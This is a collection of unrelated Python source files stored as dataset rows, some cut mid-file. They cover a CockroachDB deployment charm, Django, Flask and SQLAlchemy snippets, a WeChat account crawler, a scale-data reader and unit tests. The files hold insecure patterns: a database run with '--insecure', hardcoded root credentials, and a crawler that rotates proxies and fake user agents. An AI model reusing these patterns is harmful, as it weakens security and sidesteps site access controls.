' --strip-components 1 --no-anchored "cockroach*/cockroach"')
subprocess.check_call(cmd, shell=True)
os.chown(self.COCKROACH_BINARY_PATH, 0, 0)
else:
cmd = ['tar', '-C', self.COCKROACH_INSTALL_DIR, '-xv', '--wildcards',
'--strip-components', '1', '--no-anchored', 'cockroach*/cockroach',
'-zf', str(resource_path)]
subprocess.check_call(cmd)
def start(self):
"""Start the CockroachDB daemon.
Starting the daemon for the first time in the single instance mode also initializes the
database on-disk state.
"""
self._run_start()
self._stored.is_started = True
if self._is_single_node and not self._stored.is_initialized:
self._stored.is_initialized = self._stored.is_initialized = True
self.on.cluster_initialized.emit(self._get_cluster_id())
self.on.daemon_started.emit()
def _run_start(self):
subprocess.check_call(['systemctl', 'start', f'{self.COCKROACHDB_SERVICE}'])
def init_db(self):
if self._is_single_node:
raise RuntimeError('tried to initialize a database in a single unit mode')
elif not self.model.unit.is_leader():
raise RuntimeError('tried to initialize a database as a minion')
self._run_init()
self.on.cluster_initialized.emit(self._get_cluster_id())
def _run_init(self):
subprocess.check_call([self.COCKROACH_BINARY_PATH, 'init', '--insecure'])
def reconfigure(self):
# TODO: handle real changes here like changing the replication factors via cockroach sql
# TODO: emit daemon_started when a database is restarted.
self._setup_systemd_service()
@property
def is_started(self):
return self._stored.is_started
def _get_cluster_id(self):
for _ in range(self.MAX_RETRIES):
res = subprocess.run([self.COCKROACH_BINARY_PATH, 'debug', 'gossip-values',
'--insecure'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if not res.returncode:
out = res.stdout.decode('utf-8')
break
elif not re.findall(r'code = Unavailable desc = node waiting for init',
res.stderr.decode('utf-8')):
raise RuntimeError(
'unexpected error returned while trying to obtain gossip-values')
sleep(self.RETRY_TIMEOUT.total_seconds())
cluster_id_regex = re.compile(r'"cluster-id": (?P<uuid>[0-9a-fA-F]{8}\-[0-9a-fA-F]'
r'{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12})$')
for line in out.split('\n'):
m = cluster_id_regex.match(line)
if m:
return m.group('uuid')
raise RuntimeError('could not find cluster-id in the gossip-values output')
def _setup_systemd_service(self):
if self._is_single_node:
# start-single-node will set replication factors for all zones to 1.
exec_start_line = (f'ExecStart={self.COCKROACH_BINARY_PATH} start-single-node'
' --advertise-addr {self._cluster.advertise_addr} --insecure')
else:
peer_addresses = [self._cluster.advertise_addr]
if self._cluster.is_joined:
peer_addresses.extend(self._cluster.peer_addresses)
join_addresses = ','.join([str(a) for a in peer_addresses])
# --insecure until the charm gets CA setup support figured out.
exec_start_line = (f'ExecStart={self.COCKROACH_BINARY_PATH} start --insecure '
f'--advertise-addr={self._cluster.advertise_addr} '
f'--join={join_addresses}')
ctxt = {
'working_directory': self.WORKING_DIRECTORY,
'exec_start_line': exec_start_line,
}
env = Environment(loader=FileSystemLoader('templates'))
template = env.get_template('cockroachdb.service')
rendered_content = template.render(ctxt)
content_hash = hash(rendered_content)
# TODO: read the rendered file instead to account for any manual edits.
old_hash = getattr(self._stored, 'rendered_content_hash', None)
if old_hash is None or old_hash != content_hash:
self._stored.rendered_content_hash = content_hash
with open(self.SYSTEMD_SERVICE_FILE, 'wb') as f:
f.write(rendered_content.encode('utf-8'))
subprocess.check_call(['systemctl', 'daemon-reload'])
try:
pwd.getpwnam(self.COCKROACH_USERNAME)
except KeyError:
subprocess.check_call(['useradd',
'-m',
'--home-dir',
self.WORKING_DIRECTORY,
'--shell',
'/usr/sbin/nologin',
self.COCKROACH_USERNAME])
if self._stored.is_started:
subprocess.check_call(['systemctl', 'restart', f'{self.COCKROACHDB_SERVICE}'])
|
23,578 | f82333dc50b7758b0d8128bc3f8b31d74544bc9a | from django.urls import path
from django.conf.urls import url
from . import views
app_name='booket'
urlpatterns = [
url(r'^index/',views.index,name='index'),
url(r'^book_name/',views.book_name,name='book_name'),
url(r'^author/',views.author,name='author'),
url(r'^type/',views.type,name='type'),
url(r'^add/',views.add,name='add'),
url(r'^detail/(?P<b_id>\d+)/',views.detail,name='detail'),
url(r'^hero_detail/(?P<h_id>\d+)/',views.hero_detail,name='hero_detail'),
url(r'^add_hero/(?P<b_id>\d+)/',views.add_hero,name='add_hero'),
url(r'^update/',views.update,name='update'),
# url(r'^test/',Test.Views(),name='uprdate'),
] |
23,579 | b7b16bec80e0138895b7cda0560545a78a94155b | #
# ImageViewPil.py -- a backend for Ginga using Python Imaging Library
#
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
from ginga import ImageView
from . import PilHelp # noqa
from .CanvasRenderPil import CanvasRenderer
class ImageViewPilError(ImageView.ImageViewError):
pass
class ImageViewPil(ImageView.ImageViewBase):
def __init__(self, logger=None, rgbmap=None, settings=None):
ImageView.ImageViewBase.__init__(self, logger=logger,
rgbmap=rgbmap,
settings=settings)
# NOTE: pillow needs an RGB image in order to draw with alpha
# blending, not RGBA
self.rgb_order = 'RGB'
self.renderer = CanvasRenderer(self)
def get_surface(self):
return self.renderer.surface
def configure_surface(self, width, height):
self.renderer.resize((width, height))
# inform the base class about the actual window size
self.configure(width, height)
def get_image_as_array(self):
return self.renderer.get_surface_as_array(order=self.rgb_order)
def get_rgb_image_as_buffer(self, output=None, format='png', quality=90):
return self.renderer.get_surface_as_rgb_format_buffer(
output=output, format=format, quality=quality)
def get_rgb_image_as_bytes(self, format='png', quality=90):
return self.renderer.get_surface_as_rgb_format_bytes(
format=format, quality=quality)
def update_image(self):
# subclass implements this method to actually update a widget
# from the PIL surface
self.logger.warning("Subclass should override this method")
return False
def set_cursor(self, cursor):
# subclass implements this method to actually set a defined
# cursor on a widget
self.logger.warning("Subclass should override this method")
def reschedule_redraw(self, time_sec):
# subclass implements this method to call delayed_redraw() after
# time_sec
self.delayed_redraw()
class CanvasView(ImageViewPil):
"""This class is defined to provide a non-event handling invisible
viewer.
"""
def __init__(self, logger=None, settings=None, rgbmap=None,
bindmap=None, bindings=None):
ImageViewPil.__init__(self, logger=logger, settings=settings,
rgbmap=rgbmap)
self.defer_redraw = False
# Needed for UIMixin to propagate events correctly
self.objects = [self.private_canvas]
def set_canvas(self, canvas, private_canvas=None):
super(CanvasView, self).set_canvas(canvas,
private_canvas=private_canvas)
self.objects[0] = self.private_canvas
def update_image(self):
# no widget to update
pass
def configure_window(self, width, height):
return super(CanvasView, self).configure_surface(width, height)
# END
|
23,580 | 8f61071d32b8941a6bf601f736522cb1f466466d | from sqlalchemy import Table, MetaData, Column, Integer, String
from sqlalchemy.orm import mapper
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
from sqlalchemy import Sequence
from sqlalchemy import ForeignKey
from sqlalchemy.orm import relationship, backref
from sqlalchemy.ext.declarative import declarative_base
engine =create_engine('mysql://root:123@localhost:3306/yy')
# metadata = MetaData()
from sqlalchemy import Column, Integer, String
from sqlalchemy import ForeignKey
from sqlalchemy.orm import relationship, backref
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class User(Base):
__tablename__ = 'users'
id = Column(Integer, primary_key=True)
name = Column(String(20))
fullname = Column(String(20))
password = Column(String(20))
addr=relationship("Addr",backref='users')
def __repr__(self):
return "<User(name='%s', fullname='%s', password='%s')>" % (self.name, self.fullname, self.password)
class Addr(Base):
__tablename__ = 'addr'
id = Column(Integer, primary_key=True)
email_address = Column(String(20), nullable=False)
user_id = Column(Integer, ForeignKey('users.id'))
def __repr__(self):
return "<Address(email_address='%s')>" % self.email_address
Base.metadata.create_all(engine)
# class Parent(Base):
# __tablename__ = 'parent'
# id = Column(Integer, primary_key=True)
# children = relationship("Child")
# class Child(Base):
# __tablename__ = 'child'
# id = Column(Integer, primary_key=True)
# parent_id = Column(Integer, ForeignKey('parent.id'))
# Base.metadata.create_all(engine)
# class Parent(Base):
# __tablename__ = 'parent'
# id = Column(Integer, primary_key=True)
# child_id = Column(Integer, ForeignKey('child.id'))
# child = relationship("Child")
# class Child(Base):
# __tablename__ = 'child'
# id = Column(Integer, primary_key=True)
# class Parent(Base):
# __tablename__ = 'parent'
# id = Column(Integer, primary_key=True)
# child = relationship("Child", uselist=False, backref="parent")
# class Child(Base):
# __tablename__ = 'child'
# id = Column(Integer, primary_key=True)
# parent_id = Column(Integer, ForeignKey('parent.id'))
# Base.metadata.create_all(engine)
# association_table = Table('association', Base.metadata,
# Column('left_id', Integer, ForeignKey('left.id')),
# Column('right_id', Integer, ForeignKey('right.id'))
# )
# class Parent(Base):
# __tablename__ = 'left'
# id = Column(Integer, primary_key=True)
# children = relationship("Child",
# secondary=association_table)
# class Child(Base):
# __tablename__ = 'right'
# id = Column(Integer, primary_key=True)
# Base.metadata.create_all(engine)
|
23,581 | 2478a0c0b52f4da9d26439bd1fd07115e497f925 | from flask import Flask, render_template,redirect, url_for, request, session
import mysql.connector
mydb = mysql.connector.connect(
host="localhost",
user= "root",
password="",
database="raspored"
)
app = Flask(__name__)
app.config['SECRET_KEY'] = 'januar2020'
@app.route('/')
@app.route('/raspored')
def index():
mc = mydb.cursor()
mc.execute("SELECT * FROM raspored")
res = mc.fetchall()
teachers = list(set([teacher[3] for teacher in res]))
classrooms = list(set([classroom[7] for classroom in res]))
filtered = []
for i in range(len(teachers)):
if i >= len(classrooms):
filtered.append([teachers[i], ""])
else:
filtered.append([teachers[i], classrooms[i]])
return render_template('index.html', info=res, filtered=filtered)
if __name__ == '__main__':
app.run(debug=True)
|
23,582 | fa023d698903a841e7013b824b4ba6c34819edb9 | from virus import Virus
from random import choice, sample, randint
from collections import defaultdict
from numpy.random import normal, binomial
from host import Host
from id_generator import generate_id
import networkx as nx
class Environment(object):
"""
The Environment class is the second highest level object in the viral
simulator. Metaphorically, the Environment class can represent a
geographic location where Host objects interact with each other, and in
the process, pass viruses from one host to the next.
In the Environment class, Sampler objects can also interact with Host
objects, to simulate the process of sampling pathogens from the Host.
Multiple Environment objects can exist in a particular simulation, allowing
a host to move from Environment to Environment. This allows one to
simulate the spread of Viruses from one Environment to another, by means
of Hosts moving between them.
"""
def __init__(self, num_hosts=0):
"""Initialize the environment."""
super(Environment, self).__init__()
self.current_time = 0
self.id = generate_id()
self.hosts = []
for i in range(num_hosts):
self.create_host()
def __repr__(self):
return "Environment %s... with %s hosts." % \
(self.id[0:5], len(self.hosts))
def create_host(self):
from host import Host
h = Host(self)
return h
def add_host(self, host):
from host import Host
if isinstance(host, Host):
self.hosts.append(host)
# print('Adding host %s... to environment %s...' % (host.id[0:5], self.id[0:5]))
else:
raise TypeError('A Host object must be specified!')
def remove_host(self, host):
"""
This method removes a particular host from the environment.
"""
from host import Host
if isinstance(host, Host):
self.hosts.pop(self.hosts.index(host))
print('Removing host %s... from environment %s' % (host.id[0:5], self.id[0:5]))
elif type(host) == int:
self.hosts.pop(host)
else:
raise TypeError('A Host object or an integer must be specified!')
def infected_hosts(self):
"""
This method
"""
infected_hosts = [host for host in self.hosts if len(host.viruses) > 0]
return infected_hosts
def uninfected_hosts(self):
uninfected_hosts = [host for host in self.hosts if len(host.viruses) == 0]
return uninfected_hosts
def naive_hosts(self):
naive_hosts = [host for host in self.hosts if host.was_infected() == False]
return naive_hosts
|
23,583 | 21af0348b644fb6176a9ab022cdfad6a2293c43f | #http://www.pythonchallenge.com/pc/def/peak.html
#there is a file in source code
#tips: pickle, load
#a character pic
#reads: channel
|
23,584 | 23b84cabbe604c04522d86d9e7640ae852074d04 | import numpy as np
import pandas as pd
import torch
def read_data(file_name):
data = pd.read_csv(file_name, encoding="big5")
data = data.values
label_only = True
test_x = data[:, 0]
return test_x
def genLabels_Partition(train_X, train_Y, valid_ratio=0.9):
data_size = len(train_Y)
labels = {train_X[i]: train_Y[i] for i in range(len(train_Y))}
train_ids = [train_X[i] for i in range(int(data_size * (1 - valid_ratio)))]
valid_ids = [
train_X[i]
for i in range(int(data_size * (1 - valid_ratio)), data_size)
]
partition = {'train': train_ids, 'validation': valid_ids}
return labels, partition
read_data('./data/test.csv')
|
23,585 | 621838cab365aff494bbf5329194f90a12857943 | '''
8.19.6
Print a neat looking multiplication table like this:
1 2 3 4 5 6 7 8 9 10 11 12
:--------------------------------------------------
1: 1 2 3 4 5 6 7 8 9 10 11 12
2: 2 4 6 8 10 12 14 16 18 20 22 24
3: 3 6 9 12 15 18 21 24 27 30 33 36
4: 4 8 12 16 20 24 28 32 36 40 44 48
5: 5 10 15 20 25 30 35 40 45 50 55 60
6: 6 12 18 24 30 36 42 48 54 60 66 72
7: 7 14 21 28 35 42 49 56 63 70 77 84
8: 8 16 24 32 40 48 56 64 72 80 88 96
9: 9 18 27 36 45 54 63 72 81 90 99 108
10: 10 20 30 40 50 60 70 80 90 100 110 120
11: 11 22 33 44 55 66 77 88 99 110 121 132
12: 12 24 36 48 60 72 84 96 108 120 132 144
'''
def mutiplication_table():
layout = "{0:>3}: {1:>3} {2:>3} {3:>3} {4:>3} {5:>3} {6:>3} {7:>3} {8:>3} {9:>4} {10:>4} {11:>4} {12:>4}"
print("{0:>3} {1:>3} {2:>3} {3:>3} {4:>3} {5:>3} {6:>3} {7:>3} {8:>3} {9:>4} {10:>4} {11:>4} {12:>4}".format("", 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12))
print(" :"+("-"*54)) #might have a better way of doing this....
for i in range(1,13):
print(layout.format(i, i*1, i*2, i*3, i*4, i*5, i*6, i*7, i*8, i*9, i*10, i*11, i*12))
mutiplication_table() |
23,586 | 6be891ee551bd0db8079185ab85eb64abcc9dbb7 | def get_seat_id(bp):
lower, upper = 0, 127
for r in bp[:7]:
if r == 'F':
upper = (lower + upper - 1) // 2
else:
lower = (lower + upper + 1) // 2
row = lower # At this point, lower == upper == row
lower, upper = 0, 7
for c in bp[7:]:
if c == 'L':
upper = (lower + upper - 1) // 2
else:
lower = (lower + upper + 1) // 2
column = lower # lower == upper == row
return row * 8 + column
def part_1():
input = open('5_input.txt', 'r')
return max([get_seat_id(line.strip()) for line in input])
def part_2():
input = open('5_input.txt', 'r')
min_id, max_id, sum_ids = 1023, 0, 0
for line in input:
seat_id = get_seat_id(line.strip())
min_id = min(seat_id, min_id)
max_id = max(seat_id, max_id)
sum_ids += seat_id
expected_sum = (max_id - min_id + 1) * (max_id + min_id) / 2
return expected_sum - sum_ids
|
23,587 | acd289b6d8717ab23089f97ffda2c0068aec7b48 | import flag
import project
from time import sleep
import easylevel
import mediumlevel
import hardlevel
# This is the function that controls the end of the easy level
def end_easy_game():
print("\nCongratulations! You made it to the end of the game!\n")
sleep(2)
print("I hope you didn't google the answers ;)\n")
sleep(1)
print("Now, how about a small guessing game?\n")
sleep(2)
print("Which classical animation is based off of\nThe Big Five wild animals?")
sleep(3)
print("\nHere's a hint...\n")
print(flag.lion)
print("HAKUNA MATATA!")
sleep(2)
print("Would you like to see the questions asked?")
equestion_print = str(input("y or n :"))
if equestion_print == "y":
easylevel.easy_questions_print()
elif equestion_print == "n":
print("Okay. Goodbye!")
else:
return
# This is a function that controls the end of the medium level
def end_medium_game():
print("\nCongratulations! You made it to the end of the game!\n")
sleep(2)
print("I hope you didn't google the answers ;)\n")
sleep(1)
print("Please take the time to play the other levels for more African facts")
sleep(3)
print("Now, how about a small guessing game?\n")
sleep(2)
print("Guess the Wonder of the World\nLocated in the North Eastern part of Africa?\n")
sleep(3)
print("Here's a hint...\n")
sleep(1)
size = 15
m = (2 * size) - 2
for i in range(0, size):
for j in range(0, m):
print(end=" ")
m = m - 1
for j in range(0, i + 1):
print("* ", end=' ')
print(" ")
sleep(3)
print("\nI hope you enjoyed the game :)\nGoodbye!")
sleep(2)
print("Would you like to see the questions asked?")
mquestion_print = str(input("y or n :"))
if mquestion_print == "y":
mediumlevel.medium_questions_print()
elif mquestion_print == "n":
print("Okay. Goodbye!")
else:
return
# This is the function that controls the end of the hard level
def end_hard_game():
print("\nCongratulations! You made it to the end of the game!\n")
sleep(2)
print("I hope you didn't google the answers ;)\n")
sleep(2)
print("For your guts and apparent knowledge ;) of Africa,\n")
sleep(1)
print("Here's an ASCII Art poster of the lovely continent")
sleep(4)
print(flag.conti)
sleep(2)
print("Karibu AFRICA!\n\nHAKUNA MATATA!")
sleep(2)
print("Oh wait...\n\nThere's more...\n\n")
sleep(2)
print("How about a small guessing game?\n")
sleep(3)
print("Which is the popular tribe in Kenya\nKnown for their tapestry and ability to jump over 10 feet high?")
sleep(3)
print("Here's a hint...\n")
sleep(2)
print(flag.maasai)
sleep(2)
print("Would you like to see the questions asked?")
hquestion_print = str(input("y or n :"))
if hquestion_print == "y":
hardlevel.hard_questions_print()
elif hquestion_print == "n":
print("Okay. Goodbye!")
else:
return
# I used this function to determine the most appropriate height and width of the test_pyramid
# by changing the value of the size variable
'''def test_pyramid():
size = 15
m = (2 * size) - 2
for i in range(0, size):
for j in range(0, m):
print(end=" ")
m = m - 1
for j in range(0, i + 1):
print("* ", end=' ')
print(" ")'''
if __name__ == '__main__':
# This is non-essential for running of the game
# It was just for testing purposes
#print(flag.lion)
end_hard_game()
#test_pyramid()
|
23,588 | 2db284f3d73188d0b4d91f6f6a4a8abc95303d75 | import pandas as pd
import statsmodels.api as sm
import matplotlib.pyplot as plt
# %是jupyter notebook的魔法命令
# % matplotlib inline
# 正常显示画图时出现的中文和负号
from pylab import mpl
mpl.rcParams['font.sans-serif'] = ['SimHei']
mpl.rcParams['axes.unicode_minus'] = False
# 获取上证综指数据
import tushare as ts
df = ts.get_k_data('sh', start='2000-01-01', end='2020-06-16')
df.index = pd.to_datetime(df.date)
df.head()
# 上证综指周收益率
df_ret = df.close.resample('W').last().pct_change().dropna()
df_ret.plot(title='上证综指周收益率', figsize=(15, 4))
# plt.show()
# 平稳性检验
# 使用arch包中的单位根检验unitroot导入ADF
from arch.unitroot import ADF
adf = ADF(df_ret)
print(adf)
# 模型拟合
mod = sm.tsa.MarkovRegression(df_ret.dropna(),
k_regimes=3, trend='nc', switching_variance=True)
res = mod.fit()
res.summary()
fig, axes = plt.subplots(3, figsize=(12, 8))
ax = axes[0]
ax.plot(res.smoothed_marginal_probabilities[0])
ax.set(title='上证综指低波动平滑概率图')
ax = axes[1]
ax.plot(res.smoothed_marginal_probabilities[1])
ax.set(title='上证综指中波动平滑概率图')
ax = axes[2]
ax.plot(res.smoothed_marginal_probabilities[2])
ax.set(title='上证综指高波动平滑概率图')
# fig.tight_layout()
def plot_rsm(code, title, start='2010-01-01', end='2020-06-17'):
df = ts.get_k_data(code, start=start, end=end)
df.index = pd.to_datetime(df.date)
df_ret = df.close.resample('w').last().pct_change().dropna()
# 模型拟合
print("df_ret.dropna()", df_ret.dropna())
mod = sm.tsa.MarkovRegression(df_ret.dropna(), k_regimes=3, trend='nc', switching_variance=True)
res = mod.fit()
print(res.predicted_marginal_probabilities)
print(res.smoothed_marginal_probabilities)
print(res.predict())
fig, axes = plt.subplots(4, figsize=(12, 8))
ax = axes[0]
ax.plot(res.smoothed_marginal_probabilities[0])
ax.set(title=title + '低波动平滑概率图')
ax = axes[1]
ax.plot(res.smoothed_marginal_probabilities[1])
ax.set(title=title + '中波动平滑概率图')
ax = axes[2]
ax.plot(res.smoothed_marginal_probabilities[2])
ax.set(title=title + '高波动平滑概率图')
# fig.tight_layout()
# ax = axes[3]
# a
plot_rsm('002400', '省广集团')
plt.show()
|
23,589 | c93fbc448f368332771905b249c586fdf08e4ca2 | #!/usr/bin/python
# -*-coding:utf-8-*-
# Description: get new user_account info from weixin.sogou.com
# Version: 1.0
# History: 2014-07-04 Created by Hou
import os
import time
from threading import Thread
from bs4 import *
from config import *
from connect_with_proxy_ip_and_fake_ua import get_connect_by_proxyip_ua
from help_func_for_user_account_crawl import *
################### Main function for get new account ####################
def write_keywords_to_redis_set(keywords):
for keyword in keywords:
r.sadd('keywords_set', keyword)
def get_new_account_info_by_single_nav_page(page_num, keyword):
"""
Return a tuple of 2 items
The first is the info of a account
The second is bool indicates whether is the last nav page
"""
single_nav_info_list = []
# get the url by keywords
tmp_nav_url = get_nav_page_url_by_keywords(keyword)
nav_url = tmp_nav_url[0] + str(page_num) + tmp_nav_url[1]
print "nav_url -> ", nav_url
# connect to the website, and build soup
# get connect to the website
c = get_connect_by_proxyip_ua(nav_url)
if (c is None):
return None
# build soup
soup_obj = BeautifulSoup(c.read())
if (soup_obj is None):
return None
is_last_page = is_last_page_by_soup(soup_obj)
# print soup_obj.prettify()
# parse the soup, and get the info tag
all_divs = soup_obj.find_all("div", class_="wx-rb bg-blue wx-rb_v1 _item")
if (all_divs is None):
return None
for info_div in all_divs:
# store all the info by single tag
weibo_info = get_info_by_tag(info_div, keyword)
if weibo_info is not None:
single_nav_info_list.append(weibo_info)
return (single_nav_info_list, is_last_page)
def get_new_account_info_by_nav_pages(keyword, max_page_number=20):
""" search keyword on all pages on weixin.sogou.com
Return a list of dict, which is the all_info found for keyword
So far the max nav page number is 20
"""
new_account_info_list = []
for page_num in xrange(1, max_page_number + 1):
log(str(keyword) + " : crawl page %d ..." % page_num)
# get and store the account info by single nav page
single_nav_info_list = get_new_account_info_by_single_nav_page(
page_num, keyword)
if (single_nav_info_list is None):
log("The search is failed, check the url or the proxy_ips. \n")
break
account_info_list = single_nav_info_list[0]
if account_info_list is not None:
new_account_info_list.extend(account_info_list)
# if it is the last page, then break
is_last_page = single_nav_info_list[-1]
if (is_last_page is True):
log("The max nav page for " + '\"' +
str(keyword) + '\"' + " is %d " % page_num)
break
sleep_for_a_while()
return new_account_info_list
def get_header_list_for_new_account():
"""
Return all the field for weibo info
"""
return ["weibo_name", "weibo_id", "home_page_url", "QR_code_url",
"sogou_openid", "tou_xiang_url", "function_description",
"is_verified", "verified_info", "keywords"]
def output_new_account_to_local_file(new_account_info_list):
"""
Output new account info to local file
"""
# get header, new account has no account_id and is_existed
header_list = get_header_list_for_new_account()
header_str = '\t'.join(header_list) + '\n'
# create new path and file to store the info
time_str = time.strftime('%Y%m%d')
path_dir = "./account/" + time_str
file_path = path_dir + "/" + "new_weixin_account.tsv"
try:
# determine wheter the path is existed or not
is_dir_existed = os.path.exists(path_dir)
if (not is_dir_existed):
# create the directory, and write header_str to the file
log("the path is not existed, create a new one")
os.makedirs(path_dir)
file_obj = open(file_path, 'w')
file_obj.write(header_str)
else:
log("the path is existed")
# open the file as append mode --> no header_str
file_obj = open(file_path, 'a')
# write all the new account info to file
for single_info in new_account_info_list:
single_info_list = []
# get single account info based on header_list
for field in header_list:
single_info_list.append(single_info.get(field, 'NA'))
single_info_str = '\t'.join(
[str(i) for i in single_info_list]) + '\n'
file_obj.write(single_info_str)
except BaseException as output_error:
print "error: output_new_account_to_local_file " + output_error.message
finally:
file_obj.close()
def get_new_account_info_by_keywords_from_redis():
total_num_keywords = r.scard('account_id_set')
keyword = r.spop('keywords_set')
while keyword is not None:
log("The total number of keywords is " +
str(total_num_keywords) +
" , and remain number of keywords is " +
str(r.scard('keywords_set')) +
" , current keyword is " + str(keyword))
new_account_info_list = get_new_account_info_by_nav_pages(keyword)
if new_account_info_list is None or new_account_info_list == []:
log('search failed, add the keyword to failed set in redis ' +
'the keyword is ' + str(keyword))
r.sadd("keyword_fail_set", keyword)
keyword = r.spop('keywords_set')
continue
else:
output_new_account_to_local_file(new_account_info_list)
# next iteration
keyword = r.spop('keywords_set')
def get_new_account_info_by_keywords(keywords):
""" Get new weixin account from weixin.sogou.com by keywords
Return a list of list of dict, which contains all the weixin_info
"""
write_keywords_to_redis_set(keywords) # keywords_set
get_new_account_info_by_keywords_from_redis()
def get_new_account_with_multi_thread(keywords):
"""
Verified the account with multi_thread
"""
write_keywords_to_redis_set(keywords)
threads = []
for i in xrange(THREAD_NUM):
t = Thread(target=get_new_account_info_by_keywords_from_redis)
t.setDaemon(True)
threads.append(t)
# start all the thread
for t in threads:
t.start()
# Wait until all thread terminates
for t in threads:
t.join()
def main():
keywords = ['it', 'df', 'houxianxu', 'movie']
# get_new_account_info_by_keywords(['IT', 'df', 'houxianxu'])
get_new_account_with_multi_thread(keywords)
if __name__ == '__main__':
main()
|
23,590 | d4dfa0712d8ea26ee86cb5ad77bc3920e466074a | import numpy as np
import torch
import scipy.sparse as sp
def load_raw_data(self, path="data/email/", dataset="email", graph_size=0.8, graph_number=5):
assert path == "data/email/", "path error"
assert dataset in ["email", "email_depart1", "email_depart2", "email_depart3",
"email_depart4"], "no such dataset {}".format(dataset)
data = np.genfromtxt(path + dataset + ".txt", delimiter=' ', dtype=np.long)
source = data[:, 0]
target = data[:, 1]
time = data[:, 2]
id_set = set(np.sort(np.concatenate((source, target), axis=0)))
id_dict = {j: i for i, j in enumerate(id_set)}
source_idx = np.array([id_dict[i] for i in source])
target_idx = np.array([id_dict[i] for i in target])
node_number = len(id_dict)
timespan = time[-1] - time[0]
tmp = time[0] + int(timespan * graph_size)
stride = int((time[-1] - tmp) / graph_number)
start_time_list = [time[0] + i * stride for i in range(graph_number)]
end_time_list = [tmp + i * stride for i in range(graph_number)]
# generate E_sh
E_sh = {}
for i in range(graph_number):
start_time = start_time_list[i]
end_time = end_time_list[i]
idx = np.argwhere((time >= start_time) & (time <= end_time)).squeeze()
src_nodes = source_idx[idx]
tgt_nodes = target_idx[idx]
tgt_neg_nodes = np.random.randint(0,node_number, size=tgt_nodes.shape)
E_sh[i] = zip(src_nodes, tgt_nodes, tgt_neg_nodes)
# generate E_tr
E_tr = {}
for i in range(graph_number-1):
|
23,591 | 2507ecfcedb9b0d63c540d5229c2f582bde88826 | import board
import pulseio
import digitalio
import time
led = digitalio.DigitalInOut(board.D13)
led.direction = digitalio.Direction.OUTPUT
class ScaleReading:
OUNCES = const(0x0B) # data in weight is in ounces
GRAMS = const(0x02) # data in weight is in grams
units = None # what units we're measuring
stable = None # is the measurement stable?
weight = None # the weight!
def get_scale_data(pin, timeout=1.0):
"""Read a pulse of SPI data on a pin that corresponds to DYMO scale
output protocol (12 bytes of data at about 14KHz), timeout is in seconds"""
timestamp = time.monotonic()
with pulseio.PulseIn(pin, maxlen=96, idle_state=True) as pulses:
pulses.pause()
pulses.clear()
pulses.resume()
while len(pulses) < 35:
if (time.monotonic() - timestamp) > timeout:
raise RuntimeError("Timed out waiting for data")
pulses.pause()
bits = [0] * 96 # there are 12 bytes = 96 bits of data
bit_idx = 0 # we will count a bit at a time
bit_val = False # first pulses will be LOW
print(pulses[1])
for i in range(len(pulses)):
if pulses[i] == 65535: # This is the pulse between transmits
break
num_bits = int(pulses[i] / 75 + 0.5) # ~14KHz == ~7.5us per clock
#print("%d (%d)," % (pulses[i], num_bits), end='')
for bit in range(num_bits):
#print("bit #", bit_idx)
bits[bit_idx] = bit_val
bit_idx += 1
if bit_idx == 96: # we have read all the data we wanted
#print("DONE")
break
bit_val = not bit_val
#print(bits)
data_bytes = [0] * 12
for byte_n in range(12):
thebyte = 0
for bit_n in range(8):
thebyte <<= 1
thebyte |= bits[byte_n*8 + bit_n]
data_bytes[byte_n] = thebyte
print([hex(i) for i in data_bytes])
# do some very basic data checking
if data_bytes[0] != 3 or data_bytes[1] != 3 or data_bytes[7] != 4 \
or data_bytes[8] != 0x1C or data_bytes[9] != 0 or data_bytes[10] \
or data_bytes[11] != 0:
raise RuntimeError("Bad data capture")
reading = ScaleReading()
reading.stable = data_bytes[2] & 0x4
reading.units = data_bytes[3]
reading.weight = data_bytes[5] + (data_bytes[6] << 8)
if data_bytes[2] & 0x1:
reading.weight *= -1
if reading.units == ScaleReading.OUNCES:
# oi no easy way to cast to int8_t
if data_bytes[4] & 0x80:
data_bytes[4] -= 0x100
reading.weight *= 10 ** data_bytes[4]
return reading
while True:
try:
reading = get_scale_data(board.MISO)
if reading.units == ScaleReading.OUNCES:
print(reading.weight, "oz")
if reading.units == ScaleReading.GRAMS:
print(reading.weight, "g")
except RuntimeError:
print("Failed to read data, is scale on?")
|
23,592 | c8610467c68d6e899c6d10cb7871ba0e11cf8c1f |
import csb.bio.sequence as sequence
import csb.bio.io.fasta
import csb.test as test
@test.unit
class TestSequence(test.Case):
def setUp(self):
super(TestSequence, self).setUp()
self.data = '>id desc\nAB-CD'
self.sequence = sequence.Sequence('id', '>id desc', 'AB-CD', sequence.SequenceTypes.Protein)
assert str(self.sequence) == self.data
def testLength(self):
self.assertEqual(self.sequence.length, 5)
self.assertEqual(self.sequence.length, len(self.sequence))
def testId(self):
self.assertEqual(self.sequence.id, 'id')
def testHeader(self):
self.assertEqual(self.sequence.header, 'id desc')
def testSequence(self):
self.assertEqual(self.sequence.sequence, 'AB-CD')
def testType(self):
def test(v):
self.sequence.type = v
self.assertRaises(TypeError, test, sequence.ProteinAlphabet.ALA)
self.assertEqual(self.sequence.type, sequence.SequenceTypes.Protein)
def testAlphabet(self):
self.assertEqual(self.sequence.alphabet, sequence.ProteinAlphabet)
def testStrip(self):
self.assertEqual(self.sequence.strip().sequence, 'ABCD')
def testSubregion(self):
s = self.sequence
self.assertEqual(s.subregion(2, 3).sequence, 'B-')
self.assertRaises(sequence.SequencePositionError, s.subregion, -1, 2)
self.assertRaises(sequence.SequencePositionError, s.subregion, 1, 6)
def testExtract(self):
s = self.sequence
self.assertEqual(s.extract((2, 3, 5)).sequence, 'B-D')
self.assertRaises(sequence.SequencePositionError, s.extract, [-1])
self.assertRaises(sequence.SequencePositionError, s.extract, [6])
def testIndexeres(self):
s = self.sequence
self.assertEqual(s.residues[2].type, sequence.ProteinAlphabet.ASX)
self.assertEqual(s.residues[1].type, s[0].type)
self.assertEqual(s[:].sequence, s.sequence)
self.assertEqual(s[2:].sequence, '-CD')
self.assertEqual(s[2:3].sequence, '-')
for rank in [-1, 0, 6]:
self.assertRaises(sequence.SequencePositionError, lambda i: s.residues[i], rank)
for index in [-1, 5]:
self.assertRaises(IndexError, lambda i: s[i], index)
